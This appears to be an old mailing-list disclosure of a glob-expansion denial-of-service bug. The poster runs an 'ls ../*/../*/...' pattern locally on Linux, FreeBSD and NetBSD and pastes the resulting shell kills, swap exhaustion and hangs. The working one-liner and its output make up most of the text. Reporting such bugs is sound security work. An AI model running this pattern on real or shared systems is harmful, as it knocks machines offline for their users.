I tested this weird ls on my boxes (openbsd, linux, freebsd and
netbsd) all of them was tested locally, I think there's no need for a
dmesg because each core team will test it, the results are:

*** Linux Slackware 7.0 ***
ebola:~# uname -a
Linux ebola 2.2.13 #21 Wed Jan 5 18:58:19 BRST 2000 i586 unknown
ebola:~# ls ../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*

Welcome to Linux 2.2.13.

ebola login:

After some time I got my shell killed

*** FreeBSD 4.2 generic ***

# ls ../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
Mar 17 11:26:59 anthrax /kernel: swap_pager: out of swap space

Mar 17 11:27:00 anthrax /kernel: swap_pager_getswapspace: failed
Mar 17 11:27:00 anthrax /kernel: swap_pager_getswapspace: failed

Mar 17 11:27:14 anthrax /kernel: swap_pager_getswapspace: failed
Mar 17 11:27:14 anthrax /kernel: swap_pager_getswapspace: failed

After that there's no response from the box.

tifo# ../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*

The hard disk begin to do a evil noise and nothing happened untill I
control-c the ls after 4 hours (486)

*** NetBSD 1.5 ***

variola# ../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*

The shell stop responding to commands.
